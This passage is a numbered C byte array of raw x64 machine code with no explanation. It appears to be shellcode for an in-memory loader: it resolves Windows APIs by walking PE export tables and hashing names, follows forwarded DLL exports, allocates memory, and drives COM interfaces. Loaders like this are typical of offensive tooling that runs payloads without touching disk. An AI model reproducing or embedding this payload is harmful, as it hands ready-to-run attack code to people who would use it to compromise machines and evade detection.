179 0x4c, 0x63, 0x7a, 0x3c, 0x4d, 0x8b, 0xe9, 0x48, 0x8b, 0xda, 0x4c, 0x8b,
180 0xe1, 0x41, 0x8b, 0x84, 0x17, 0x88, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f,
181 0x84, 0x95, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x3c, 0x02, 0x8b, 0x77, 0x18,
182 0x85, 0xf6, 0x0f, 0x84, 0x86, 0x00, 0x00, 0x00, 0x8b, 0x47, 0x1c, 0x33,
183 0xc9, 0x44, 0x8b, 0x47, 0x0c, 0x48, 0x03, 0xc2, 0x48, 0x89, 0x44, 0x24,
184 0x30, 0x4c, 0x03, 0xc2, 0x8b, 0x47, 0x20, 0x48, 0x03, 0xc2, 0x48, 0x89,
185 0x85, 0x58, 0x01, 0x00, 0x00, 0x8b, 0x47, 0x24, 0x48, 0x03, 0xc2, 0x48,
186 0x89, 0x44, 0x24, 0x28, 0x41, 0x8a, 0x00, 0x84, 0xc0, 0x74, 0x14, 0x33,
187 0xd2, 0xff, 0xc1, 0x0c, 0x20, 0x88, 0x44, 0x15, 0x00, 0x8b, 0xd1, 0x42,
188 0x8a, 0x04, 0x01, 0x84, 0xc0, 0x75, 0xee, 0xc6, 0x44, 0x0d, 0x00, 0x00,
189 0x49, 0x8b, 0xd5, 0x48, 0x8d, 0x4d, 0x00, 0xe8, 0xbc, 0x1b, 0x00, 0x00,
190 0x48, 0x89, 0x44, 0x24, 0x20, 0x48, 0x8b, 0x85, 0x58, 0x01, 0x00, 0x00,
191 0xff, 0xce, 0x49, 0x8b, 0xd5, 0x8b, 0x0c, 0xb0, 0x48, 0x03, 0xcb, 0xe8,
192 0xa0, 0x1b, 0x00, 0x00, 0x48, 0x33, 0x44, 0x24, 0x20, 0x48, 0x3b, 0x85,
193 0x60, 0x01, 0x00, 0x00, 0x74, 0x21, 0x85, 0xf6, 0x75, 0xd7, 0x33, 0xc0,
194 0x48, 0x8b, 0x9c, 0x24, 0x50, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x10,
195 0x02, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5f,
196 0x5e, 0x5d, 0xc3, 0x48, 0x8b, 0x44, 0x24, 0x28, 0x48, 0x8b, 0x4c, 0x24,
197 0x30, 0x0f, 0xb7, 0x04, 0x70, 0x44, 0x8b, 0x04, 0x81, 0x4c, 0x03, 0xc3,
198 0x4c, 0x3b, 0xc7, 0x0f, 0x82, 0xaf, 0x00, 0x00, 0x00, 0x41, 0x8b, 0x84,
199 0x1f, 0x8c, 0x00, 0x00, 0x00, 0x48, 0x03, 0xc7, 0x4c, 0x3b, 0xc0, 0x0f,
200 0x83, 0x9b, 0x00, 0x00, 0x00, 0x33, 0xdb, 0x44, 0x8b, 0xcb, 0x41, 0x38,
201 0x18, 0x74, 0x21, 0x41, 0x83, 0xf9, 0x3c, 0x73, 0x1b, 0x41, 0x8b, 0xc9,
202 0x42, 0x8a, 0x04, 0x01, 0x88, 0x44, 0x0c, 0x40, 0x42, 0x80, 0x3c, 0x01,
203 0x2e, 0x74, 0x09, 0x41, 0xff, 0xc1, 0x43, 0x38, 0x1c, 0x01, 0x75, 0xdf,
204 0x41, 0x8d, 0x41, 0x01, 0x8b, 0xd0, 0xc6, 0x44, 0x04, 0x40, 0x64, 0x41,
205 0x8d, 0x41, 0x02, 0xc6, 0x44, 0x04, 0x40, 0x6c, 0x41, 0x8d, 0x41, 0x03,
206 0xc6, 0x44, 0x04, 0x40, 0x6c, 0x41, 0x8d, 0x41, 0x04, 0x4e, 0x8d, 0x0c,
207 0x02, 0x88, 0x5c, 0x04, 0x40, 0x8b, 0xd3, 0x41, 0x38, 0x19, 0x74, 0x17,
208 0x83, 0xfa, 0x7f, 0x73, 0x12, 0x8b, 0xca, 0xff, 0xc2, 0x42, 0x8a, 0x04,
209 0x09, 0x88, 0x44, 0x0d, 0x80, 0x42, 0x38, 0x1c, 0x0a, 0x75, 0xe9, 0x8b,
210 0xc2, 0x48, 0x8d, 0x4c, 0x24, 0x40, 0x88, 0x5c, 0x05, 0x80, 0x41, 0xff,
211 0x54, 0x24, 0x30, 0x48, 0x85, 0xc0, 0x74, 0x11, 0x48, 0x8d, 0x55, 0x80,
212 0x48, 0x8b, 0xc8, 0x41, 0xff, 0x54, 0x24, 0x38, 0x4c, 0x8b, 0xc0, 0xeb,
213 0x03, 0x4c, 0x8b, 0xc3, 0x49, 0x8b, 0xc0, 0xe9, 0x10, 0xff, 0xff, 0xff,
214 0x40, 0x53, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b, 0x4a, 0x30, 0x48, 0x8b,
215 0xda, 0x48, 0x85, 0xc9, 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10,
216 0x48, 0x83, 0x63, 0x30, 0x00, 0x48, 0x8b, 0x4b, 0x38, 0x48, 0x85, 0xc9,
217 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10, 0x48, 0x83, 0x63, 0x38,
218 0x00, 0x48, 0x8b, 0x4b, 0x28, 0x48, 0x85, 0xc9, 0x74, 0x0b, 0x48, 0x8b,
219 0x01, 0xff, 0x50, 0x10, 0x48, 0x83, 0x63, 0x28, 0x00, 0x48, 0x8b, 0x4b,
220 0x20, 0x48, 0x85, 0xc9, 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10,
221 0x48, 0x83, 0x63, 0x20, 0x00, 0x48, 0x8b, 0x4b, 0x18, 0x48, 0x85, 0xc9,
222 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10, 0x48, 0x83, 0x63, 0x18,
223 0x00, 0x48, 0x8b, 0x4b, 0x10, 0x48, 0x85, 0xc9, 0x74, 0x15, 0x48, 0x8b,
224 0x01, 0xff, 0x50, 0x58, 0x48, 0x8b, 0x4b, 0x10, 0x48, 0x8b, 0x01, 0xff,
225 0x50, 0x10, 0x48, 0x83, 0x63, 0x10, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48,
226 0x85, 0xc9, 0x74, 0x0b, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x10, 0x48, 0x83,
227 0x63, 0x08, 0x00, 0x48, 0x8b, 0x0b, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0x48,
228 0x8b, 0x01, 0xff, 0x50, 0x10, 0x48, 0x83, 0x23, 0x00, 0x48, 0x83, 0xc4,
229 0x20, 0x5b, 0xc3, 0xcc, 0xf0, 0xff, 0x41, 0x20, 0x8b, 0x41, 0x20, 0xc3,
230 0x48, 0x8b, 0x49, 0x10, 0x45, 0x8b, 0xd1, 0x4c, 0x8b, 0x4c, 0x24, 0x30,
231 0x49, 0x8b, 0xd0, 0x45, 0x8b, 0xc2, 0x48, 0x8b, 0x01, 0x48, 0xff, 0x60,
232 0x50, 0xcc, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x08, 0x57, 0x48, 0x83,
233 0xec, 0x20, 0x49, 0x8b, 0xd9, 0x48, 0x8b, 0xf9, 0x4d, 0x85, 0xc9, 0x75,
234 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x13, 0x48, 0x8b, 0x49, 0x10,
235 0x48, 0x8b, 0x01, 0xff, 0x50, 0x08, 0x48, 0x8b, 0x47, 0x10, 0x48, 0x89,
236 0x03, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x48, 0x83, 0xc4, 0x20,
237 0x5f, 0xc3, 0xcc, 0xcc, 0x48, 0x85, 0xd2, 0x75, 0x06, 0xb8, 0x03, 0x40,
238 0x00, 0x80, 0xc3, 0xc7, 0x02, 0x01, 0x00, 0x00, 0x00, 0x33, 0xc0, 0xc3,
239 0x48, 0x83, 0xec, 0x48, 0x48, 0x8b, 0x84, 0x24, 0x90, 0x00, 0x00, 0x00,
240 0x4c, 0x8b, 0xd9, 0x48, 0x8b, 0x49, 0x10, 0x44, 0x8b, 0xc2, 0x44, 0x0f,
241 0xb7, 0x4c, 0x24, 0x70, 0x49, 0x8b, 0xd3, 0x48, 0x89, 0x44, 0x24, 0x38,
242 0x48, 0x8b, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x11, 0x48,
243 0x89, 0x44, 0x24, 0x30, 0x48, 0x8b, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00,
244 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8b, 0x44, 0x24, 0x78, 0x48, 0x89,
245 0x44, 0x24, 0x20, 0x41, 0xff, 0x52, 0x58, 0x48, 0x83, 0xc4, 0x48, 0xc3,
246 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57, 0x48,
247 0x81, 0xec, 0x40, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x02, 0x48, 0x8b, 0xf9,
248 0x48, 0x8d, 0x0d, 0x31, 0x02, 0x00, 0x00, 0x48, 0x8b, 0xda, 0x48, 0x89,
249 0x08, 0x48, 0x8d, 0x0d, 0x0c, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48,
250 0x89, 0x48, 0x08, 0x48, 0x8d, 0x0d, 0xa6, 0x02, 0x00, 0x00, 0x48, 0x8b,
251 0x02, 0x48, 0x89, 0x48, 0x10, 0x48, 0x8d, 0x0d, 0x50, 0xff, 0xff, 0xff,
252 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x18, 0x48, 0x8d, 0x0d, 0x06, 0xff,
253 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x20, 0x48, 0x8d, 0x0d,
254 0xdc, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x28, 0x48,
255 0x8d, 0x0d, 0x3a, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48,
256 0x30, 0x48, 0x8d, 0x0d, 0xb4, 0xf5, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48,
257 0x89, 0x48, 0x38, 0x48, 0x8d, 0x0d, 0x3a, 0xf5, 0xff, 0xff, 0x48, 0x8b,
258 0x02, 0x48, 0x89, 0x48, 0x40, 0x48, 0x8d, 0x0d, 0x2c, 0xf5, 0xff, 0xff,
259 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x48, 0x48, 0x8d, 0x0d, 0x1e, 0xf5,
260 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x50, 0x48, 0x8d, 0x0d,
261 0x10, 0xf5, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x58, 0x48,
262 0x8d, 0x0d, 0x02, 0xf5, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48,
263 0x60, 0x48, 0x8d, 0x0d, 0xec, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x02, 0x48,
264 0x89, 0x48, 0x68, 0x48, 0x8d, 0x0d, 0xe6, 0xf4, 0xff, 0xff, 0x48, 0x8b,
265 0x02, 0x48, 0x89, 0x48, 0x70, 0x48, 0x8d, 0x0d, 0xd8, 0xf4, 0xff, 0xff,
266 0x48, 0x8b, 0x02, 0x48, 0x89, 0x48, 0x78, 0x48, 0x8d, 0x0d, 0xca, 0xf4,
267 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0x80, 0x00, 0x00, 0x00,
268 0x48, 0x8d, 0x0d, 0xb9, 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89,
269 0x88, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0xa8, 0xf4, 0xff, 0xff,
270 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8d,
271 0x0d, 0x97, 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0x98,
272 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x86, 0xf4, 0xff, 0xff, 0x48, 0x8b,
273 0x02, 0x48, 0x89, 0x88, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x75,
274 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0xa8, 0x00, 0x00,
275 0x00, 0x48, 0x8d, 0x0d, 0x64, 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48,
276 0x89, 0x88, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x53, 0xf4, 0xff,
277 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0xb8, 0x00, 0x00, 0x00, 0x48,
278 0x8d, 0x0d, 0x42, 0xf4, 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88,
279 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x55, 0x01, 0x00, 0x00, 0x48,
280 0x8b, 0x02, 0x48, 0x89, 0x88, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x02,
281 0x48, 0x8d, 0x0d, 0x1d, 0xf4, 0xff, 0xff, 0xc7, 0x44, 0x24, 0x28, 0x00,
282 0x01, 0x00, 0x00, 0x48, 0x89, 0x88, 0xd0, 0x00, 0x00, 0x00, 0x4c, 0x8d,
283 0x87, 0xe8, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x02, 0x48, 0x8d, 0x0d, 0xfd,
284 0xf3, 0xff, 0xff, 0x41, 0x83, 0xc9, 0xff, 0x48, 0x89, 0x88, 0xd8, 0x00,
285 0x00, 0x00, 0x48, 0x8d, 0x0d, 0xeb, 0xf3, 0xff, 0xff, 0x48, 0x8b, 0x02,
286 0x48, 0x89, 0x88, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0xda, 0xf3,
287 0xff, 0xff, 0x48, 0x8b, 0x02, 0x48, 0x89, 0x88, 0xe8, 0x00, 0x00, 0x00,
288 0x48, 0x8d, 0x44, 0x24, 0x30, 0x83, 0x62, 0x20, 0x00, 0x33, 0xc9, 0x48,
289 0x89, 0x7a, 0x28, 0x33, 0xd2, 0x48, 0x89, 0x44, 0x24, 0x20, 0xff, 0x57,
290 0x70, 0x48, 0x8d, 0x53, 0x08, 0x48, 0x8d, 0x4c, 0x24, 0x30, 0xff, 0x97,
291 0xe8, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x75, 0x15, 0x48, 0x8b, 0x4b, 0x08,
292 0x4c, 0x8d, 0x43, 0x10, 0x48, 0x8d, 0x97, 0x84, 0x06, 0x00, 0x00, 0x48,
293 0x8b, 0x01, 0xff, 0x50, 0x30, 0x4c, 0x8d, 0x9c, 0x24, 0x40, 0x02, 0x00,
294 0x00, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x18, 0x49, 0x8b, 0xe3,
295 0x5f, 0xc3, 0xcc, 0xcc, 0x4c, 0x8b, 0xc9, 0x4d, 0x85, 0xc0, 0x75, 0x06,
296 0xb8, 0x03, 0x40, 0x00, 0x80, 0xc3, 0x48, 0x8b, 0x49, 0x28, 0x48, 0x8b,
297 0x81, 0xf4, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x0d, 0x48, 0x8b,
298 0x81, 0xfc, 0x05, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x74, 0x32, 0x48,
299 0x8b, 0x81, 0x04, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x0d, 0x48,
300 0x8b, 0x81, 0x0c, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x74, 0x19,
301 0x48, 0x8b, 0x81, 0x84, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x02, 0x75, 0x13,
302 0x48, 0x8b, 0x81, 0x8c, 0x06, 0x00, 0x00, 0x48, 0x3b, 0x42, 0x08, 0x75,
303 0x06, 0x4d, 0x89, 0x08, 0x33, 0xc0, 0xc3, 0x49, 0x83, 0x20, 0x00, 0xb8,
304 0x02, 0x40, 0x00, 0x80, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x83, 0xec, 0x28,
305 0x48, 0x8b, 0x49, 0x18, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0xba, 0xfd,
306 0xff, 0xff, 0xff, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x70, 0x33, 0xc0, 0x48,
307 0x83, 0xc4, 0x28, 0xc3, 0x83, 0xc8, 0xff, 0xf0, 0x0f, 0xc1, 0x41, 0x20,
308 0xff, 0xc8, 0xc3, 0xcc, 0x48, 0x83, 0xec, 0x28, 0x48, 0x8b, 0x41, 0x28,
309 0x8b, 0xca, 0xff, 0x50, 0x68, 0x33, 0xc0, 0x48, 0x83, 0xc4, 0x28, 0xc3,
310 0x48, 0x89, 0x5c, 0x24, 0x08, 0x57, 0x48, 0x81, 0xec, 0xa0, 0x00, 0x00,
311 0x00, 0x48, 0x8b, 0xfa, 0x48, 0x8d, 0x99, 0x6c, 0x04, 0x00, 0x00, 0x8a,
312 0x03, 0x45, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x84, 0xc0, 0x74, 0x56, 0x48,
313 0x8d, 0x54, 0x24, 0x20, 0x48, 0x8b, 0xcb, 0x48, 0x2b, 0xd3, 0x3c, 0x3b,
314 0x74, 0x1b, 0x49, 0x81, 0xf8, 0x80, 0x00, 0x00, 0x00, 0x7d, 0x12, 0x88,
315 0x04, 0x11, 0x41, 0xff, 0xc1, 0x48, 0xff, 0xc1, 0x49, 0xff, 0xc0, 0x8a,
316 0x01, 0x84, 0xc0, 0x75, 0xe1, 0x4d, 0x85, 0xc0, 0x74, 0x27, 0x49, 0x63,
317 0xc9, 0x48, 0x8b, 0xd7, 0x48, 0xff, 0xc1, 0x42, 0xc6, 0x44, 0x04, 0x20,
318 0x00, 0x48, 0x03, 0xd9, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xe8, 0xca, 0x1a,
319 0x00, 0x00, 0x85, 0xc0, 0x75, 0xa5, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb,
320 0x02, 0x33, 0xc0, 0x48, 0x8b, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x48,
321 0x81, 0xc4, 0xa0, 0x00, 0x00, 0x00, 0x5f, 0xc3, 0x40, 0x53, 0x48, 0x83,
322 0xec, 0x50, 0x33, 0xdb, 0x48, 0x8b, 0xc2, 0x4c, 0x8b, 0xc9, 0x48, 0x85,
323 0xd2, 0x74, 0x37, 0x44, 0x8d, 0x43, 0x30, 0x48, 0x8b, 0xc8, 0x48, 0x8d,
324 0x54, 0x24, 0x20, 0x41, 0xff, 0x51, 0x58, 0x83, 0xf8, 0x30, 0x75, 0x22,
325 0x81, 0x7c, 0x24, 0x40, 0x00, 0x10, 0x00, 0x00, 0x75, 0x14, 0x81, 0x7c,
326 0x24, 0x48, 0x00, 0x00, 0x02, 0x00, 0x75, 0x0a, 0x83, 0x7c, 0x24, 0x44,
327 0x04, 0x75, 0x03, 0x8d, 0x58, 0xd1, 0x8b, 0xc3, 0xeb, 0x02, 0x33, 0xc0,
328 0x48, 0x83, 0xc4, 0x50, 0x5b, 0xc3, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24,
329 0x10, 0x48, 0x89, 0x6c, 0x24, 0x18, 0x56, 0x57, 0x41, 0x54, 0x41, 0x56,
330 0x41, 0x57, 0x48, 0x81, 0xec, 0x30, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x89,
331 0x40, 0x01, 0x00, 0x00, 0x33, 0xc0, 0x45, 0x33, 0xff, 0x41, 0x83, 0xcc,
332 0xff, 0x4d, 0x8b, 0xf0, 0x48, 0x8b, 0xea, 0x48, 0x8b, 0xf1, 0xbf, 0x00,
333 0x01, 0x00, 0x00, 0x4d, 0x85, 0xc9, 0x0f, 0x84, 0xba, 0x00, 0x00, 0x00,
334 0x48, 0x8d, 0x91, 0x24, 0x06, 0x00, 0x00, 0x48, 0x81, 0xc1, 0x14, 0x06,
335 0x00, 0x00, 0x41, 0xff, 0xd1, 0x85, 0xc0, 0x78, 0x7d, 0x48, 0x8d, 0x44,
336 0x24, 0x30, 0x89, 0x7c, 0x24, 0x28, 0x4c, 0x8d, 0x45, 0x0c, 0x48, 0x89,
337 0x44, 0x24, 0x20, 0x45, 0x8b, 0xcc, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56,
338 0x70, 0x49, 0x8b, 0x0e, 0x49, 0x8d, 0x5e, 0x08, 0x4c, 0x8d, 0x86, 0x34,
339 0x06, 0x00, 0x00, 0x4c, 0x8b, 0xcb, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48,
340 0x8b, 0x01, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x78, 0x3c, 0x48, 0x8b, 0x0b,
341 0x48, 0x8d, 0x94, 0x24, 0x60, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff,
342 0x50, 0x50, 0x85, 0xc0, 0x78, 0x33, 0x44, 0x39, 0xbc, 0x24, 0x60, 0x02,
343 0x00, 0x00, 0x74, 0x25, 0x48, 0x8b, 0x0b, 0x4d, 0x8d, 0x4e, 0x10, 0x4c,
344 0x8d, 0x86, 0x54, 0x06, 0x00, 0x00, 0x48, 0x8d, 0x96, 0x44, 0x06, 0x00,
345 0x00, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x48, 0xeb, 0x08, 0x4c, 0x21, 0x3b,
346 0xeb, 0x03, 0x4d, 0x21, 0x3e, 0x85, 0xc0, 0x79, 0x30, 0x49, 0x8d, 0x46,
347 0x10, 0x33, 0xd2, 0x4c, 0x8d, 0x8e, 0x54, 0x06, 0x00, 0x00, 0x48, 0x89,
348 0x44, 0x24, 0x20, 0x4c, 0x8d, 0x86, 0x44, 0x06, 0x00, 0x00, 0x33, 0xc9,
349 0xff, 0x96, 0x38, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x79, 0x0b, 0x4d, 0x21,
350 0x7e, 0x10, 0x33, 0xc0, 0xe9, 0x23, 0x01, 0x00, 0x00, 0x49, 0x8b, 0x4e,
351 0x10, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x50, 0x85, 0xc0, 0x0f, 0x88, 0x0e,
352 0x01, 0x00, 0x00, 0x48, 0x8d, 0x44, 0x24, 0x30, 0x89, 0x7c, 0x24, 0x28,
353 0x4c, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20,
354 0x45, 0x8b, 0xcc, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0x56, 0x70, 0x48, 0x8d,
355 0x4c, 0x24, 0x30, 0xff, 0x96, 0xd8, 0x00, 0x00, 0x00, 0x49, 0x8b, 0x4e,
356 0x10, 0x4d, 0x8d, 0x4e, 0x18, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd0, 0x48,
357 0x8b, 0xf8, 0x4c, 0x8b, 0x11, 0x41, 0xff, 0x52, 0x60, 0x48, 0x8b, 0xcf,
358 0x8b, 0xd8, 0xff, 0x96, 0xe0, 0x00, 0x00, 0x00, 0x85, 0xdb, 0x0f, 0x88,
359 0xb9, 0x00, 0x00, 0x00, 0x49, 0x8b, 0x4e, 0x18, 0x48, 0x8d, 0x96, 0x64,
360 0x06, 0x00, 0x00, 0x4d, 0x8d, 0x46, 0x20, 0x48, 0x8b, 0x01, 0xff, 0x10,
361 0x85, 0xc0, 0x0f, 0x88, 0x9d, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x24, 0x05,
362 0x00, 0x00, 0x4c, 0x8d, 0x84, 0x24, 0x78, 0x02, 0x00, 0x00, 0x44, 0x21,
363 0xbc, 0x24, 0x7c, 0x02, 0x00, 0x00, 0xb9, 0x11, 0x00, 0x00, 0x00, 0x89,
364 0x84, 0x24, 0x78, 0x02, 0x00, 0x00, 0x8d, 0x51, 0xf0, 0xff, 0x96, 0xa8,
365 0x00, 0x00, 0x00, 0x48, 0x8b, 0xd8, 0x48, 0x85, 0xc0, 0x74, 0x6a, 0x4c,
366 0x8b, 0x40, 0x10, 0x33, 0xd2, 0x39, 0x95, 0x24, 0x05, 0x00, 0x00, 0x76,
367 0x15, 0x8a, 0x84, 0x2a, 0x28, 0x05, 0x00, 0x00, 0x42, 0x88, 0x04, 0x02,
368 0xff, 0xc2, 0x3b, 0x95, 0x24, 0x05, 0x00, 0x00, 0x72, 0xeb, 0x49, 0x8b,
369 0x4e, 0x20, 0x4d, 0x8d, 0x46, 0x28, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0x01,
370 0xff, 0x90, 0x68, 0x01, 0x00, 0x00, 0x85, 0xc0, 0x48, 0x8b, 0x43, 0x10,
371 0x41, 0x0f, 0x94, 0xc7, 0x33, 0xd2, 0x39, 0x95, 0x24, 0x05, 0x00, 0x00,
372 0x76, 0x16, 0xc6, 0x84, 0x2a, 0x28, 0x05, 0x00, 0x00, 0x00, 0xc6, 0x04,
373 0x02, 0x00, 0xff, 0xc2, 0x3b, 0x95, 0x24, 0x05, 0x00, 0x00, 0x72, 0xea,
374 0x48, 0x8b, 0xcb, 0xff, 0x96, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x8b, 0xc7,
375 0x4c, 0x8d, 0x9c, 0x24, 0x30, 0x02, 0x00, 0x00, 0x49, 0x8b, 0x5b, 0x38,
376 0x49, 0x8b, 0x6b, 0x40, 0x49, 0x8b, 0xe3, 0x41, 0x5f, 0x41, 0x5e, 0x41,
377 0x5c, 0x5f, 0x5e, 0xc3, 0x48, 0x89, 0x5c, 0x24, 0x20, 0x55, 0x56, 0x57,
378 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xec, 0x90,
379 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x41, 0x28, 0x48, 0x8b, 0xd9, 0x48, 0x8b,
380 0x51, 0x48, 0xe8, 0x59, 0x12, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48,
381 0x8b, 0xcb, 0x48, 0x8b, 0x53, 0x50, 0x4c, 0x8b, 0xe0, 0xe8, 0x46, 0x12,
382 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b, 0xcb, 0x48, 0x8b, 0x93,
383 0x88, 0x01, 0x00, 0x00, 0x4c, 0x8b, 0xf8, 0xe8, 0x30, 0x12, 0x00, 0x00,
384 0x4c, 0x8b, 0xf0, 0x4d, 0x85, 0xe4, 0x74, 0x35, 0x4d, 0x85, 0xff, 0x74,
385 0x30, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x8b, 0x13, 0xbd, 0x04, 0x00, 0x00,
386 0x00, 0x44, 0x8b, 0xcd, 0x33, 0xc9, 0x41, 0xb8, 0x00, 0x30, 0x00, 0x00,
387 0x41, 0xff, 0xd4, 0x48, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x75, 0x2c, 0x83,
388 0xbb, 0x30, 0x02, 0x00, 0x00, 0x02, 0x75, 0x05, 0x33, 0xc9, 0x41, 0xff,
389 0xd6, 0x83, 0xc8, 0xff, 0x48, 0x8b, 0x9c, 0x24, 0xe8, 0x01, 0x00, 0x00,
390 0x48, 0x81, 0xc4, 0x90, 0x01, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41,
391 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5d, 0xc3, 0x44, 0x8b, 0x03, 0x48, 0x8b,
392 0xd3, 0x48, 0x8b, 0xce, 0xe8, 0x1b, 0x17, 0x00, 0x00, 0x33, 0xd2, 0x48,
393 0x8d, 0x4c, 0x24, 0x40, 0x44, 0x8d, 0x42, 0x40, 0xe8, 0x2b, 0x17, 0x00,
394 0x00, 0x83, 0xbe, 0x34, 0x02, 0x00, 0x00, 0x03, 0x41, 0xbd, 0x01, 0x00,
395 0x00, 0x00, 0x75, 0x3b, 0x44, 0x8b, 0x0e, 0x4c, 0x8d, 0x86, 0x40, 0x02,
396 0x00, 0x00, 0x41, 0x81, 0xe9, 0x40, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x56,
397 0x14, 0x48, 0x8d, 0x4e, 0x04, 0xe8, 0x46, 0x13, 0x00, 0x00, 0x48, 0x8b,
398 0x56, 0x28, 0x48, 0x8d, 0x8e, 0xf0, 0x07, 0x00, 0x00, 0xe8, 0xee, 0x11,
399 0x00, 0x00, 0x48, 0x3b, 0x86, 0xf0, 0x08, 0x00, 0x00, 0x0f, 0x85, 0x97,
400 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x46, 0x28, 0x48, 0x8b, 0xce, 0x48, 0x8b,
401 0x56, 0x30, 0xe8, 0x5d, 0x11, 0x00, 0x00, 0x48, 0x89, 0x46, 0x30, 0x48,
402 0x85, 0xc0, 0x0f, 0x84, 0x5d, 0xff, 0xff, 0xff, 0x48, 0x8d, 0x9e, 0x44,
403 0x02, 0x00, 0x00, 0x8a, 0x03, 0x33, 0xd2, 0x84, 0xc0, 0x74, 0x40, 0x33,
404 0xc9, 0x3c, 0x3b, 0x74, 0x1b, 0x81, 0xfa, 0x04, 0x01, 0x00, 0x00, 0x73,
405 0x13, 0x41, 0x03, 0xd5, 0x88, 0x84, 0x0c, 0x80, 0x00, 0x00, 0x00, 0x8b,
